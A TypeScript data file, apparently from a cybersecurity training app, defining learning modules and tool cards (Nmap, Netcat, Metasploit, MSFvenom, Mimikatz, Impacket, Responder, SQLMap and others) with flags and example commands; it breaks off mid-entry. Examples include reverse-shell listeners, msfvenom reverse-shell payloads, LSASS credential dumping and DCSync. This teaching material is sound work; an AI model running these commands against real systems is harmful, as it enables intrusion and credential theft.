import type { Module, ToolCard, Challenge, TrainingSet } from './types'

// ─── Learning Path ────────────────────────────────────────────────────────────

export const MODULES: Module[] = [
  {
    id: 'linux-fundamentals',
    title: 'Linux Temelleri',
    subtitle: 'Komut satırına hâkimiyet',
    difficulty: 'beginner',
    color: '#00ff41',
    icon: '🐧',
    toolIds: ['netcat', 'linpeas'],
    topics: [
      'Dosya sistemi hiyerarşisi (FHS)',
      'Temel komutlar: ls, cd, cat, grep, find',
      'Dosya izinleri ve chmod/chown',
      'Stdin/stdout/stderr ve yönlendirme',
      'Pipe zinciri ve metin işleme',
      'Kullanıcı yönetimi ve sudo',
      'Ortam değişkenleri ve PATH',
      'Bash scripting temelleri',
    ],
    resources: [
      { label: 'OverTheWire: Bandit', url: 'https://overthewire.org/wargames/bandit/' },
      { label: 'Linux Journey', url: 'https://linuxjourney.com/' },
      { label: 'The Linux Command Line', url: 'https://linuxcommand.org/tlcl.php' },
    ],
  },
  {
    id: 'network-fundamentals',
    title: 'Ağ Temelleri',
    subtitle: 'TCP/IP, protokoller ve paket analizi',
    difficulty: 'beginner',
    color: '#00d4ff',
    icon: '🌐',
    toolIds: ['nmap', 'wireshark', 'netcat'],
    topics: [
      'OSI ve TCP/IP modeli',
      'IP adresleme ve subnetting',
      'TCP/UDP farkları ve handshake',
      'HTTP/HTTPS, DNS, DHCP, ARP',
      'Wireshark ile paket yakalama',
      'Nmap ile port tarama',
      'Netcat: ağın İsviçre çakısı',
      'Firewall ve IDS/IPS temelleri',
    ],
    resources: [
      { label: 'TryHackMe: Pre-Security', url: 'https://tryhackme.com/path/outline/presecurity' },
      { label: 'Wireshark Docs', url: 'https://www.wireshark.org/docs/' },
      { label: 'Nmap Book', url: 'https://nmap.org/book/' },
    ],
  },
  {
    id: 'web-security',
    title: 'Web Güvenliği',
    subtitle: 'OWASP Top 10 ve pratik saldırılar',
    difficulty: 'intermediate',
    color: '#f59e0b',
    icon: '🕸️',
    toolIds: ['burpsuite', 'sqlmap', 'gobuster', 'ffuf', 'nikto', 'wpscan', 'wfuzz', 'nuclei'],
    topics: [
      'HTTP protokolü derinlemesine',
      'OWASP Top 10 (2021)',
      'SQL Injection (SQLi)',
      'Cross-Site Scripting (XSS)',
      'CSRF, SSRF, XXE',
      'Burp Suite ile intercepting',
      'Directory traversal & LFI/RFI',
      'Authentication bypass teknikleri',
      'JWT ve session yönetimi açıkları',
      'API güvenliği',
    ],
    resources: [
      { label: 'PortSwigger Web Academy', url: 'https://portswigger.net/web-security' },
      { label: 'OWASP Testing Guide', url: 'https://owasp.org/www-project-web-security-testing-guide/' },
      { label: 'HackTheBox Web Challenges', url: 'https://app.hackthebox.com/challenges' },
    ],
  },
  {
    id: 'penetration-testing',
    title: 'Sızma Testi',
    subtitle: 'Metodoloji ve araç kullanımı',
    difficulty: 'intermediate',
    color: '#8b5cf6',
    icon: '🔓',
    toolIds: ['nmap', 'metasploit', 'msfvenom', 'linpeas', 'impacket', 'enum4linux'],
    topics: [
      'Pentest metodolojisi (PTES, OSSTMM)',
      'Kali Linux ortamı',
      'Keşif: Passive & Active Recon',
      'Zafiyet tarama: Nessus, OpenVAS',
      'Metasploit Framework',
      'Post-exploitation teknikleri',
      'Privilege escalation (Linux & Windows)',
      'Pivoting ve lateral movement',
      'Rapor yazımı ve bulgular',
    ],
    resources: [
      { label: 'PTES Standard', url: 'http://www.pentest-standard.org/' },
      { label: 'HackTheBox', url: 'https://www.hackthebox.com/' },
      { label: 'TryHackMe: Jr Pentester', url: 'https://tryhackme.com/path/outline/jrpenetrationtester' },
    ],
  },
  {
    id: 'exploit-development',
    title: 'Exploit Geliştirme',
    subtitle: 'Buffer overflow ve ileri teknikler',
    difficulty: 'advanced',
    color: '#ef4444',
    icon: '💥',
    toolIds: ['gdb', 'metasploit', 'msfvenom', 'radare2'],
    topics: [
      'x86/x64 Assembly temelleri',
      'Stack ve heap yönetimi',
      'Buffer overflow (Stack-based)',
      'Return-Oriented Programming (ROP)',
      'Format string zafiyetleri',
      'ASLR, NX/DEP, Stack Canary bypass',
      'Heap exploitation (Use-after-free)',
      'Kernel exploit geliştirme',
      'CVE analizi ve PoC yazımı',
    ],
    resources: [
      { label: 'PWN.college', url: 'https://pwn.college/' },
      { label: 'exploit.education', url: 'https://exploit.education/' },
      { label: 'LiveOverflow YouTube', url: 'https://www.youtube.com/@LiveOverflow' },
    ],
  },
  {
    id: 'reverse-engineering',
    title: 'Tersine Mühendislik',
    subtitle: 'Binary analiz ve malware inceleme',
    difficulty: 'advanced',
    color: '#f97316',
    icon: '🔬',
    toolIds: ['ghidra', 'gdb', 'radare2', 'binwalk'],
    topics: [
      'ELF ve PE binary formatları',
      'Static analiz: strings, file, objdump',
      'GDB ile dynamic analiz',
      'Radare2 ve Ghidra kullanımı',
      'Crackme çözümleri',
      'Anti-debugging teknikleri',
      'Obfuscation ve packing',
      'Firmware analizi (binwalk)',
    ],
    resources: [
      { label: 'Ghidra (NSA)', url: 'https://ghidra-sre.org/' },
      { label: 'Malware Unicorn Workshops', url: 'https://malwareunicorn.org/' },
      { label: 'Crackmes.one', url: 'https://crackmes.one/' },
    ],
  },
  {
    id: 'malware-analysis',
    title: 'Malware Analizi',
    subtitle: 'Kötü amaçlı yazılım inceleme',
    difficulty: 'advanced',
    color: '#dc2626',
    icon: '🦠',
    toolIds: ['volatility', 'binwalk', 'ghidra', 'wireshark'],
    topics: [
      'Malware türleri: RAT, Ransomware, Rootkit',
      'Güvenli analiz ortamı kurma',
      'Static analiz: PE yapısı, imports',
      'Dynamic analiz: Process Monitor, RegShot',
      'YARA kural yazımı',
      'Network traffic analizi',
      'Memory forensics (Volatility)',
      'Sandbox analizi (Any.run, Cuckoo)',
    ],
    resources: [
      { label: 'ANY.RUN Sandbox', url: 'https://any.run/' },
      { label: 'MalwareBazaar', url: 'https://bazaar.abuse.ch/' },
      { label: 'Practical Malware Analysis (kitap)', url: 'https://www.amazon.com/Practical-Malware-Analysis/dp/1593272901' },
    ],
  },
  {
    id: 'red-team',
    title: 'Red Team Operasyonları',
    subtitle: 'Gelişmiş kalıcı tehdit simülasyonu',
    difficulty: 'expert',
    color: '#7c3aed',
    icon: '🎯',
    toolIds: ['metasploit', 'mimikatz', 'impacket', 'responder', 'msfvenom'],
    topics: [
      'Red Team vs Pentest farkı',
      'MITRE ATT&CK framework',
      'C2 (Command & Control) altyapısı',
      'Cobalt Strike & Sliver',
      'Phishing kampanyaları',
      'Active Directory saldırıları',
      'Kerberoasting, Pass-the-Hash',
      'Evasion ve AV bypass',
      'OPSEC ve iz silme',
    ],
    resources: [
      { label: 'MITRE ATT&CK', url: 'https://attack.mitre.org/' },
      { label: 'Red Team Notes', url: 'https://www.ired.team/' },
      { label: 'VulnLab', url: 'https://www.vulnlab.com/' },
    ],
  },

  // ── 4 Yeni Modül ─────────────────────────────────────────────────────────────

  {
    id: 'cloud-security',
    title: 'Cloud Güvenliği',
    subtitle: 'AWS, GCP ve Azure saldırı yüzeyi',
    difficulty: 'intermediate',
    color: '#06b6d4',
    icon: '☁️',
    toolIds: ['nuclei', 'amass', 'shodan'],
    topics: [
      'Cloud paylaşım modeli (IaaS/PaaS/SaaS)',
      'AWS IAM yanlış yapılandırmaları',
      'S3 bucket açık erişim tespiti',
      'Metadata API saldırıları (SSRF→cloud)',
      'Azure AD ve Entra ID keşfi',
      'GCP service account ayrıcalıkları',
      'Container ve Kubernetes güvenliği',
      'Serverless fonksiyon güvenliği',
      'Cloud forensics ve log analizi',
    ],
    resources: [
      { label: 'HackTricks Cloud', url: 'https://cloud.hacktricks.xyz/' },
      { label: 'CloudGoat (Vulnerable AWS)', url: 'https://github.com/RhinoSecurityLabs/cloudgoat' },
      { label: 'flaws.cloud (AWS Lab)', url: 'http://flaws.cloud/' },
    ],
  },
  {
    id: 'digital-forensics',
    title: 'Dijital Adli Bilişim',
    subtitle: 'Olay müdahale ve delil analizi',
    difficulty: 'advanced',
    color: '#a78bfa',
    icon: '🔍',
    toolIds: ['volatility', 'binwalk', 'wireshark'],
    topics: [
      'DFIR metodolojisi ve zincir muhafaza',
      'Disk imajı alma (dd, FTK Imager)',
      'Dosya sistemi analizi (The Sleuth Kit)',
      'Windows artefaktları (Registry, Prefetch, LNK)',
      'Memory forensics temelleri',
      'Log analizi (Windows Event Log, Syslog)',
      'Timeline analizi ve korelasyon',
      'Ağ trafiği inceleme ve protokol analizi',
      'Olay müdahale raporu yazımı',
    ],
    resources: [
      { label: 'SANS FOR508', url: 'https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/' },
      { label: 'CyberDefenders', url: 'https://cyberdefenders.org/' },
      { label: 'Blue Team Labs Online', url: 'https://blueteamlabs.online/' },
    ],
  },
  {
    id: 'bug-bounty',
    title: 'Bug Bounty',
    subtitle: 'Recon, scope ve responsible disclosure',
    difficulty: 'intermediate',
    color: '#fb923c',
    icon: '🐛',
    toolIds: ['amass', 'sublist3r', 'ffuf', 'gobuster', 'nuclei', 'burpsuite'],
    topics: [
      'Bug bounty platformları (HackerOne, Bugcrowd, Intigriti)',
      'Scope analizi ve program seçimi',
      'Passive recon: Amass, Subfinder, Shodan',
      'Active recon: port tarama, dizin keşfi',
      'OWASP bulgu kategorileri',
      'Zafiyet doğrulama ve PoC hazırlama',
      'Etkili rapor yazımı (CVSS, reproduction steps)',
      'Duplicate önleme taktikleri',
      'Ödül optimizasyonu ve triage süreci',
    ],
    resources: [
      { label: 'HackerOne Hacktivity', url: 'https://hackerone.com/hacktivity' },
      { label: 'Bugcrowd University', url: 'https://www.bugcrowd.com/hackers/bugcrowd-university/' },
      { label: 'NahamCon Talks', url: 'https://www.youtube.com/@NahamSec' },
    ],
  },
  {
    id: 'social-engineering',
    title: 'Sosyal Mühendislik',
    subtitle: 'İnsan faktörü ve manipülasyon teknikleri',
    difficulty: 'beginner',
    color: '#f43f5e',
    icon: '🎭',
    toolIds: ['theharvester', 'maltego', 'spiderfoot'],
    topics: [
      'Sosyal mühendislik psikolojisi',
      'Pretexting ve kimlik taklit',
      'Phishing: hedefli (spear) ve genel',
      'Vishing (telefon tabanlı saldırılar)',
      'Smishing ve QR code saldırıları',
      'OSINT ile hedef profili oluşturma',
      'LinkedIn ve sosyal medya istihbaratı',
      'E-posta sahteciliği (SPF/DKIM/DMARC bypass)',
      'Farkındalık eğitimi ve karşı önlemler',
    ],
    resources: [
      { label: 'Social Engineer Toolkit (SET)', url: 'https://github.com/trustedsec/social-engineer-toolkit' },
      { label: 'Phishme / Cofense', url: 'https://cofense.com/' },
      { label: 'SE-Radio Podcast', url: 'https://www.se-radio.net/' },
    ],
  },
]

// ─── Tool Cards ───────────────────────────────────────────────────────────────

export const TOOL_CATEGORIES = ['All', 'Network', 'Web', 'Exploit', 'Password', 'Recon', 'Reverse', 'Forensics', 'OSINT'] as const

export const TOOLS: ToolCard[] = [

  // ── Network ──────────────────────────────────────────────────────────────────

  {
    id: 'nmap',
    name: 'Nmap',
    category: 'Network',
    difficulty: 'beginner',
    version: '7.94',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Industry-standard port scanner for network discovery and security auditing.',
    install: 'sudo apt install nmap',
    flags: [
      { flag: '-sS',           description: 'SYN (stealth) scan' },
      { flag: '-sV',           description: 'Detect service versions' },
      { flag: '-sC',           description: 'Run default scripts' },
      { flag: '-O',            description: 'OS fingerprinting' },
      { flag: '-p-',           description: 'Scan all 65535 ports' },
      { flag: '-A',            description: '-sV -sC -O -traceroute combo' },
      { flag: '-T4',           description: 'Faster scan timing' },
      { flag: '--script vuln', description: 'Vulnerability scripts' },
    ],
    examples: [
      { command: 'nmap -sV -sC -p- 10.10.10.1', description: 'Full port + service + script scan' },
      { command: 'nmap -sn 192.168.1.0/24',      description: 'Subnet host discovery (ping sweep)' },
      { command: 'nmap -sS -T4 --top-ports 1000 target', description: 'Top 1000 ports fast scan' },
      { command: 'nmap --script=http-enum target', description: 'HTTP directory enumeration' },
    ],
    tags: ['port-scan', 'recon', 'network'],
  },
  {
    id: 'wireshark',
    name: 'Wireshark',
    category: 'Network',
    difficulty: 'beginner',
    version: '4.2.4',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'GUI-based network protocol analyzer with real-time packet capture.',
    install: 'sudo apt install wireshark',
    flags: [
      { flag: 'ip.addr == X.X.X.X',   description: 'IP address filter' },
      { flag: 'tcp.port == 80',        description: 'Port filter' },
      { flag: 'http.request',          description: 'HTTP requests' },
      { flag: 'dns',                   description: 'DNS traffic' },
      { flag: 'tcp.flags.syn == 1',    description: 'SYN packets' },
      { flag: 'frame contains "FLAG"', description: 'Content search' },
    ],
    examples: [
      { command: 'tshark -i eth0 -w capture.pcap', description: 'Save pcap from the CLI' },
      { command: "tshark -r cap.pcap -Y 'http' -T fields -e http.request.uri", description: 'Extract HTTP URLs' },
      { command: "tshark -r cap.pcap -Y 'dns.flags.response == 0'", description: 'Filter DNS queries' },
    ],
    tags: ['packet-analysis', 'network', 'forensics'],
  },
  {
    id: 'netcat',
    name: 'Netcat (nc)',
    category: 'Network',
    difficulty: 'beginner',
    version: '1.219',
    os: ['Linux', 'macOS'],
    description: 'Multi-purpose TCP/UDP networking tool — "the network Swiss Army knife."',
    install: 'sudo apt install netcat-openbsd',
    flags: [
      { flag: '-l', description: 'Listen mode' },
      { flag: '-p', description: 'Specify port' },
      { flag: '-e', description: 'Execute program (legacy nc)' },
      { flag: '-v', description: 'Verbose mode' },
      { flag: '-n', description: 'Skip DNS resolution' },
      { flag: '-u', description: 'UDP mode' },
    ],
    examples: [
      { command: 'nc -lvnp 4444',              description: 'Open a reverse-shell listener' },
      { command: 'nc 10.10.10.1 4444',         description: 'Connect to a target' },
      { command: 'nc -z -v target 20-100',     description: 'Port scan (20-100)' },
      { command: 'cat file | nc -l 1234',      description: 'File transfer (sender)' },
      { command: 'nc target 1234 > file',      description: 'File transfer (receiver)' },
    ],
    tags: ['reverse-shell', 'network', 'pivoting'],
  },
  {
    id: 'aircrack-ng',
    name: 'Aircrack-ng',
    category: 'Network',
    difficulty: 'intermediate',
    version: '1.7',
    os: ['Linux', 'macOS'],
    description: 'Wi-Fi security auditing suite. WEP/WPA/WPA2 cracking and packet injection.',
    install: 'sudo apt install aircrack-ng',
    flags: [
      { flag: 'airmon-ng start wlan0',    description: 'Switch interface to monitor mode' },
      { flag: 'airodump-ng wlan0mon',     description: 'Scan nearby networks' },
      { flag: '-c <channel>',             description: 'Select channel' },
      { flag: '--bssid <mac>',            description: 'Target AP MAC address' },
      { flag: '-w <file>',                description: 'Capture output filename' },
      { flag: 'aireplay-ng -0 10',        description: 'Send deauth attack' },
    ],
    examples: [
      { command: 'sudo airmon-ng start wlan0\nsudo airodump-ng wlan0mon', description: 'Enable monitor mode and list networks' },
      { command: 'sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon', description: 'Capture target AP' },
      { command: 'aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap', description: 'Crack a WPA2 handshake' },
    ],
    tags: ['wireless', 'wifi', 'wpa2', 'cracking'],
  },
  {
    id: 'enum4linux',
    name: 'Enum4linux',
    category: 'Network',
    difficulty: 'beginner',
    version: '0.9.1',
    os: ['Linux'],
    description: 'Windows and Samba enumeration tool for SMB recon and information gathering.',
    install: 'sudo apt install enum4linux\n# or\ngit clone https://github.com/CiscoCXSecurity/enum4linux',
    flags: [
      { flag: '-a',          description: 'Simple full enumeration' },
      { flag: '-U',          description: 'List users' },
      { flag: '-S',          description: 'List shares' },
      { flag: '-P',          description: 'Get password policy' },
      { flag: '-G',          description: 'List groups' },
      { flag: '-o',          description: 'OS information' },
    ],
    examples: [
      { command: 'enum4linux -a 10.10.10.1',  description: 'Full enumeration sweep' },
      { command: 'enum4linux -U 10.10.10.1',  description: 'User listing' },
      { command: 'enum4linux -S 10.10.10.1',  description: 'SMB share listing' },
    ],
    tags: ['smb', 'windows', 'enumeration', 'network'],
  },
  {
    id: 'responder',
    name: 'Responder',
    category: 'Network',
    difficulty: 'intermediate',
    version: '3.1.4.0',
    os: ['Linux'],
    description: 'LLMNR/NBT-NS/MDNS poisoner for capturing NTLMv2 hashes on Windows networks.',
    install: 'git clone https://github.com/lgandx/Responder\ncd Responder && pip3 install -r requirements.txt',
    flags: [
      { flag: '-I <interface>',  description: 'Select network interface' },
      { flag: '-rdw',            description: 'Poison LLMNR, NBT-NS and MDNS' },
      { flag: '-v',              description: 'Verbose mode' },
      { flag: '--lm',            description: 'Request LM hashes' },
      { flag: '-f',              description: 'Fingerprint mode' },
    ],
    examples: [
      { command: 'sudo python3 Responder.py -I eth0 -rdwv',  description: 'Full poisoning mode' },
      { command: 'sudo python3 Responder.py -I eth0 -A',     description: 'Analyze (passive) mode' },
    ],
    tags: ['llmnr', 'ntlm', 'hash-capture', 'windows', 'network'],
  },

  // ── Web ───────────────────────────────────────────────────────────────────────

  {
    id: 'burpsuite',
    name: 'Burp Suite',
    category: 'Web',
    difficulty: 'intermediate',
    version: '2024.3',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Integrated platform for web application security testing — Proxy, Scanner, Intruder.',
    install: 'https://portswigger.net/burp/releases',
    flags: [
      { flag: 'Proxy → Intercept', description: 'Intercept and modify HTTP requests' },
      { flag: 'Repeater',          description: 'Resend and edit individual requests' },
      { flag: 'Intruder',          description: 'Brute force and fuzzing' },
      { flag: 'Scanner',           description: 'Automated vulnerability scanning (Pro)' },
      { flag: 'Decoder',           description: 'Base64, URL encode/decode' },
      { flag: 'Comparer',          description: 'Diff two responses' },
    ],
    examples: [
      { command: 'sqlmap -r request.txt --dbs', description: 'SQLMap from a saved Burp request' },
      { command: 'ffuf -w wordlist -u URL/FUZZ -x http://127.0.0.1:8080', description: 'Fuzz through the Burp proxy' },
    ],
    tags: ['web', 'proxy', 'scanner'],
  },
  {
    id: 'sqlmap',
    name: 'SQLMap',
    category: 'Web',
    difficulty: 'intermediate',
    version: '1.8.9',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Automated SQL injection detection and exploitation tool.',
    install: 'sudo apt install sqlmap',
    flags: [
      { flag: '-u',         description: 'Target URL' },
      { flag: '-r',         description: 'HTTP request file' },
      { flag: '--dbs',      description: 'List databases' },
      { flag: '-D <db>',    description: 'Select database' },
      { flag: '--tables',   description: 'List tables' },
      { flag: '--dump',     description: 'Dump table contents' },
      { flag: '--batch',    description: 'Auto-confirm all prompts' },
      { flag: '--level=5',  description: 'Test depth (1-5)' },
      { flag: '--os-shell', description: 'Spawn an OS shell' },
    ],
    examples: [
      { command: "sqlmap -u 'http://target/page?id=1' --dbs --batch", description: 'Enumerate databases' },
      { command: "sqlmap -r burp_request.txt -D users --tables --dump", description: 'Dump tables' },
      { command: "sqlmap -u 'URL' --cookie='session=abc' --level=5 --risk=3", description: 'High-depth scan with cookie' },
    ],
    tags: ['sqli', 'web', 'database'],
  },
  {
    id: 'gobuster',
    name: 'Gobuster',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.6.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'HTTP directory and file brute-forcer. Also handles DNS subdomain enumeration.',
    install: 'sudo apt install gobuster',
    flags: [
      { flag: 'dir',  description: 'Directory/file mode' },
      { flag: 'dns',  description: 'Subdomain enumeration mode' },
      { flag: '-u',   description: 'Target URL' },
      { flag: '-w',   description: 'Wordlist file' },
      { flag: '-x',   description: 'File extensions (php,txt,html)' },
      { flag: '-t',   description: 'Thread count (default 10)' },
      { flag: '-s',   description: 'Treat these HTTP codes as success' },
    ],
    examples: [
      { command: 'gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt', description: 'Basic directory scan' },
      { command: 'gobuster dir -u http://target -w wordlist.txt -x php,txt,html -t 50',   description: 'Fast scan with extensions' },
      { command: 'gobuster dns -d target.com -w subdomains.txt',                          description: 'Subdomain enumeration' },
    ],
    tags: ['web', 'directory', 'brute-force'],
  },
  {
    id: 'ffuf',
    name: 'FFUF',
    category: 'Web',
    difficulty: 'beginner',
    version: '2.1.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'High-speed web fuzzer for directory, parameter, vhost and content discovery.',
    install: 'sudo apt install ffuf',
    flags: [
      { flag: '-u',  description: 'Target URL (use the FUZZ keyword)' },
      { flag: '-w',  description: 'Wordlist' },
      { flag: '-H',  description: 'Add request header' },
      { flag: '-fs', description: 'Filter by response size' },
      { flag: '-fc', description: 'Filter by HTTP code' },
      { flag: '-mc', description: 'Match only these HTTP codes' },
    ],
    examples: [
      { command: 'ffuf -w wordlist.txt -u http://target/FUZZ',                         description: 'Directory fuzzing' },
      { command: 'ffuf -w params.txt -u "http://target/page?FUZZ=test" -fs 1234',      description: 'Parameter discovery' },
      { command: 'ffuf -w vhosts.txt -u http://target -H "Host: FUZZ.target.com" -fs 0', description: 'Virtual host enumeration' },
    ],
    tags: ['web', 'fuzzing', 'recon'],
  },
  {
    id: 'nikto',
    name: 'Nikto',
    category: 'Web',
    difficulty: 'beginner',
    version: '2.1.6',
    os: ['Linux', 'macOS', 'Windows'],
    description: 'Web server vulnerability scanner — checks 6700+ dangerous files and CGI paths.',
    install: 'sudo apt install nikto',
    flags: [
      { flag: '-h <host>',    description: 'Target server or URL' },
      { flag: '-p <port>',    description: 'Port number (default 80)' },
      { flag: '-ssl',         description: 'Force SSL/HTTPS' },
      { flag: '-o <file>',    description: 'Save output to a file' },
      { flag: '-Format htm',  description: 'HTML formatted report' },
      { flag: '-Tuning x',    description: 'Select test category (0-9,x)' },
    ],
    examples: [
      { command: 'nikto -h http://target.com',                      description: 'Basic web server scan' },
      { command: 'nikto -h https://target.com -ssl -p 443',         description: 'HTTPS scan on port 443' },
      { command: 'nikto -h target.com -o results.html -Format htm', description: 'Generate an HTML report' },
    ],
    tags: ['web', 'scanner', 'vulnerability', 'server'],
  },
  {
    id: 'wpscan',
    name: 'WPScan',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.8.25',
    os: ['Linux', 'macOS'],
    description: 'WordPress security scanner. Surfaces plugin, theme and user vulnerabilities.',
    install: 'gem install wpscan\n# or via Docker:\ndocker run -it --rm wpscanteam/wpscan --url https://target.com',
    flags: [
      { flag: '--url <url>',          description: 'WordPress site URL' },
      { flag: '--enumerate p',        description: 'List plugins' },
      { flag: '--enumerate u',        description: 'List users' },
      { flag: '--enumerate t',        description: 'List themes' },
      { flag: '--passwords <list>',   description: 'Password brute-force' },
      { flag: '--api-token <token>',  description: 'API token unlocks deeper CVE data' },
    ],
    examples: [
      { command: 'wpscan --url https://target.com',                 description: 'Basic WordPress scan' },
      { command: 'wpscan --url https://target.com --enumerate p,u', description: 'Plugin and user enumeration' },
      { command: 'wpscan --url https://target.com --passwords /usr/share/wordlists/rockyou.txt --usernames admin', description: 'Admin password brute-force' },
    ],
    tags: ['web', 'wordpress', 'cms', 'vulnerability'],
  },
  {
    id: 'wfuzz',
    name: 'Wfuzz',
    category: 'Web',
    difficulty: 'intermediate',
    version: '3.1.0',
    os: ['Linux', 'macOS'],
    description: 'Web application fuzzer with strong support for URL, header and POST parameter fuzzing.',
    install: 'pip3 install wfuzz\n# or:\nsudo apt install wfuzz',
    flags: [
      { flag: '-w <wordlist>',     description: 'Wordlist file' },
      { flag: '-u <url>',          description: 'URL containing the FUZZ keyword' },
      { flag: '--hc <code>',       description: 'Hide responses with this HTTP code' },
      { flag: '--sc <code>',       description: 'Show only this code' },
      { flag: '-H "Header: FUZZ"', description: 'Header fuzzing' },
      { flag: '-d "param=FUZZ"',   description: 'POST body fuzzing' },
    ],
    examples: [
      { command: 'wfuzz -w wordlist.txt -u http://target.com/FUZZ --hc 404', description: 'Directory enumeration, hide 404s' },
      { command: "wfuzz -w users.txt -w pass.txt -u http://target/login -d 'user=FUZZ&pass=FUZ2Z' --hc 403", description: 'Dual-payload brute-force' },
    ],
    tags: ['web', 'fuzzing', 'brute-force', 'directory'],
  },
  {
    id: 'nuclei',
    name: 'Nuclei',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.2.9',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Template-based vulnerability scanner. 5000+ ready templates for rapid scanning.',
    install: 'go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest\n# or:\nsudo apt install nuclei',
    flags: [
      { flag: '-u <url>',           description: 'Target URL' },
      { flag: '-t <template>',      description: 'Template file or directory' },
      { flag: '-severity <level>',  description: 'Filter: critical,high,medium,low' },
      { flag: '-l <file>',          description: 'URL list file' },
      { flag: '-o <file>',          description: 'Save results to file' },
      { flag: '-as',                description: 'Automatic scan mode' },
    ],
    examples: [
      { command: 'nuclei -u https://target.com',                              description: 'Scan with all templates' },
      { command: 'nuclei -u https://target.com -severity critical,high',      description: 'Only critical/high findings' },
      { command: 'nuclei -l targets.txt -t cves/ -o results.txt',             description: 'Multi-target CVE scan' },
    ],
    tags: ['web', 'vulnerability', 'scanner', 'template', 'cve'],
  },

  // ── Exploit ───────────────────────────────────────────────────────────────────

  {
    id: 'metasploit',
    name: 'Metasploit',
    category: 'Exploit',
    difficulty: 'intermediate',
    version: '6.4.12',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'The world\'s most widely used penetration testing framework.',
    install: 'sudo apt install metasploit-framework',
    flags: [
      { flag: 'msfconsole',        description: 'Launch the main console' },
      { flag: 'search <keyword>',  description: 'Search exploits/modules' },
      { flag: 'use <module>',      description: 'Select a module' },
      { flag: 'show options',      description: 'Show module options' },
      { flag: 'set RHOSTS <ip>',   description: 'Target IP' },
      { flag: 'set LHOST <ip>',    description: 'Listener IP' },
      { flag: 'run / exploit',     description: 'Launch the attack' },
      { flag: 'sessions',          description: 'List active sessions' },
    ],
    examples: [
      { command: 'msfconsole -q', description: 'Start in quiet mode' },
      { command: 'use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST 10.10.14.1\nrun', description: 'Reverse shell listener' },
      { command: 'search type:exploit platform:linux', description: 'Search Linux exploits' },
    ],
    tags: ['exploit', 'framework', 'post-exploitation'],
  },
  {
    id: 'msfvenom',
    name: 'MSFvenom',
    category: 'Exploit',
    difficulty: 'intermediate',
    version: '6.4.12',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Metasploit payload generation and encoding utility.',
    install: '# Ships with Metasploit\nsudo apt install metasploit-framework',
    flags: [
      { flag: '-p',          description: 'Select payload' },
      { flag: '-f',          description: 'Format (exe, elf, php, raw)' },
      { flag: '-o',          description: 'Output file' },
      { flag: '-e',          description: 'Select encoder' },
      { flag: '-i',          description: 'Encoder iteration count' },
      { flag: 'LHOST LPORT', description: 'Listener IP and port' },
    ],
    examples: [
      { command: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf', description: 'Linux reverse shell' },
      { command: 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o payload.exe', description: 'Windows Meterpreter' },
      { command: 'msfvenom -p php/reverse_php LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php', description: 'PHP web shell' },
    ],
    tags: ['payload', 'exploit', 'av-bypass'],
  },
  {
    id: 'impacket',
    name: 'Impacket',
    category: 'Exploit',
    difficulty: 'advanced',
    version: '0.12.0',
    os: ['Linux', 'macOS'],
    description: 'Python library for Windows/AD attacks — Pass-the-Hash, Kerberoasting, NTLM relay.',
    install: 'pip3 install impacket\n# or:\ngit clone https://github.com/fortra/impacket && pip3 install .',
    flags: [
      { flag: 'psexec.py',       description: 'PsExec-style remote command execution' },
      { flag: 'smbclient.py',    description: 'SMB client and share access' },
      { flag: 'secretsdump.py',  description: 'Dump SAM/NTDS.dit hashes' },
      { flag: 'GetUserSPNs.py',  description: 'Kerberoasting — SPN accounts' },
      { flag: 'GetNPUsers.py',   description: 'AS-REP Roasting' },
      { flag: 'ntlmrelayx.py',   description: 'NTLM relay attack' },
    ],
    examples: [
      { command: 'python3 psexec.py domain/user:pass@10.10.10.1', description: 'PsExec via hash or password' },
      { command: 'python3 secretsdump.py domain/admin:pass@DC_IP', description: 'Domain hash dump' },
      { command: 'python3 GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request', description: 'Pull Kerberoasting tickets' },
    ],
    tags: ['windows', 'active-directory', 'pass-the-hash', 'kerberoasting'],
  },
  {
    id: 'mimikatz',
    name: 'Mimikatz',
    category: 'Exploit',
    difficulty: 'advanced',
    version: '2.2.0-20220919',
    os: ['Windows'],
    description: 'Windows credential dumping tool. Extracts password hashes and cleartext from LSASS.',
    install: '# Runs on Windows (AV exclusion or bypass may be required)\n# GitHub: gentilkiwi/mimikatz\n# PowerShell alternative: Invoke-Mimikatz',
    flags: [
      { flag: 'privilege::debug',            description: 'Acquire SeDebug privilege (required)' },
      { flag: 'sekurlsa::logonpasswords',    description: 'All passwords from LSASS' },
      { flag: 'sekurlsa::pth',              description: 'Pass-the-Hash attack' },
      { flag: 'lsadump::sam',               description: 'Dump the SAM database' },
      { flag: 'lsadump::dcsync',            description: 'DCSync — pull NTDS hashes' },
      { flag: 'kerberos::golden',           description: 'Forge a Golden Ticket' },
    ],
    examples: [
      { command: 'privilege::debug\nsekurlsa::logonpasswords', description: 'Dump all cleartext credentials and hashes' },
      { command: 'lsadump::dcsync /domain:domain.local /user:Administrator', description: 'DCSync the Domain Admin hash' },
    ],
    tags: ['windows', 'credential-dumping', 'pass-the-hash', 'active-directory'],
  },

  // ── Password ─────────────────────────────────────────────────────────────────

  {
    id: 'hydra',
    name: 'Hydra',
    category: 'Password',
    difficulty: 'beginner',
    version: '9.5',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Online password brute-force tool with support for 50+ protocols.',
